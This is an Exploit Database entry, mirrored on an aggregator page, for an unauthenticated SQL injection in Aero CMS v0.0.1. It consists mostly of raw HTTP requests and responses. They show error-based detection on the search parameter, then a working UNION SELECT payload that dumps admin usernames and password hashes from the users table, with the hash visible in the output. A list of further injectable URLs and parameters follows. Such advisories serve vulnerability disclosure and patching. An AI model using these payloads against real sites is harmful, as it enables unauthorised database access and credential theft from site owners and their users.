Aero CMS v0.0.1 – SQL Injection (no auth)

• Exploit Database
• 15 阅读

• 作者： Hubert Wojciechowski
  日期： 2023-03-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51083/

• # Exploit Title: Aero CMS v0.0.1 - SQL Injection (no auth)
  # Date: 15/10/2022
  # Exploit Author: Hubert Wojciechowski
  # Contact Author: hub.woj12345@gmail.com
  # Vendor Homepage: https://github.com/MegaTKC/AeroCMS
  # Software Link: https://github.com/MegaTKC/AeroCMS
  # Version: 0.0.1
  # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
  
  ## Example SQL Injection
  
  -----------------------------------------------------------------------------------------------------------------------
  Param: search
  -----------------------------------------------------------------------------------------------------------------------
  Req sql ini detect
  -----------------------------------------------------------------------------------------------------------------------
  
  POST /AeroCMS-master/search.php HTTP/1.1
  Host: 127.0.0.1
  Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
  Origin: http://127.0.0.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Upgrade-Insecure-Requests: 1
  Referer: http://127.0.0.1/AeroCMS-master/
  Content-Type: application/x-www-form-urlencoded
  Accept-Language: en-US;q=0.9,en;q=0.8
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Content-Length: 21
  
  search=245692'&submit=
  
  -----------------------------------------------------------------------------------------------------------------------
  Res:
  -----------------------------------------------------------------------------------------------------------------------
  
  HTTP/1.1 200 OK
  Date: Sat, 15 Oct 2022 03:07:06 GMT
  Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Content-Length: 3466
  Connection: close
  Content-Type: text/html; charset=UTF-8
  [...]
  Query failed You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%'' at line 1
  
  -----------------------------------------------------------------------------------------------------------------------
  Req
  -----------------------------------------------------------------------------------------------------------------------
  
  POST /AeroCMS-master/search.php HTTP/1.1
  Host: 127.0.0.1
  Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
  Origin: http://127.0.0.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Upgrade-Insecure-Requests: 1
  Referer: http://127.0.0.1/AeroCMS-master/
  Content-Type: application/x-www-form-urlencoded
  Accept-Language: en-US;q=0.9,en;q=0.8
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Content-Length: 21
  
  search=245692''&submit=
  
  -----------------------------------------------------------------------------------------------------------------------
  Res:
  -----------------------------------------------------------------------------------------------------------------------
  
  HTTP/1.1 200 OK
  Date: Sat, 15 Oct 2022 03:07:10 GMT
  Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 94216
  [...]
  
  -----------------------------------------------------------------------------------------------------------------------
  Req exploiting sql ini get data admin
  -----------------------------------------------------------------------------------------------------------------------
  
  POST /AeroCMS-master/search.php HTTP/1.1
  Host: 127.0.0.1
  Cookie: PHPSESSID=g49qkbeug3g8gr0vlsufqa1g57
  Origin: http://127.0.0.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Upgrade-Insecure-Requests: 1
  Referer: http://127.0.0.1/AeroCMS-master/
  Content-Type: application/x-www-form-urlencoded
  Accept-Language: en-US;q=0.9,en;q=0.8
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Content-Length: 113
  
  search=245692'+union+select+1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12+from+users#&submit=
  
  -----------------------------------------------------------------------------------------------------------------------
  Res:
  -----------------------------------------------------------------------------------------------------------------------
  
  HTTP/1.1 200 OK
  Date: Sat, 15 Oct 2022 05:40:05 GMT
  Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
  X-Powered-By: PHP/5.6.40
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 101144
  [...]
  
  <a href="https://www.exploit-db.com/exploits/51083/#">admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne,admin:$2y$12$0BgqODF66TD.JZxL5MVRlOEIvap9XzkBEMVEeHyHe6RiOxdGrx3Ne</a>
  [...]
  
  -----------------------------------------------------------------------------------------------------------------------
  Other URL and params
  -----------------------------------------------------------------------------------------------------------------------
  /AeroCMS-master/admin/posts.php [post_title]
  /AeroCMS-master/admin/posts.php [filename]
  /AeroCMS-master/admin/profile.php [filename]
  /AeroCMS-master/author_posts.php [author]
  /AeroCMS-master/category.php [category]
  /AeroCMS-master/post.php [p_id]
  /AeroCMS-master/search.php [search]
  /AeroCMS-master/admin/categories.php [cat_title]
  /AeroCMS-master/admin/categories.php [phpwcmsBELang cookie]
  /AeroCMS-master/admin/posts.php [post_content]
  /AeroCMS-master/admin/posts.php [p_id]
  /AeroCMS-master/admin/posts.php [post_category_id]
  /AeroCMS-master/admin/posts.php [post_title]
  /AeroCMS-master/admin/posts.php [reset]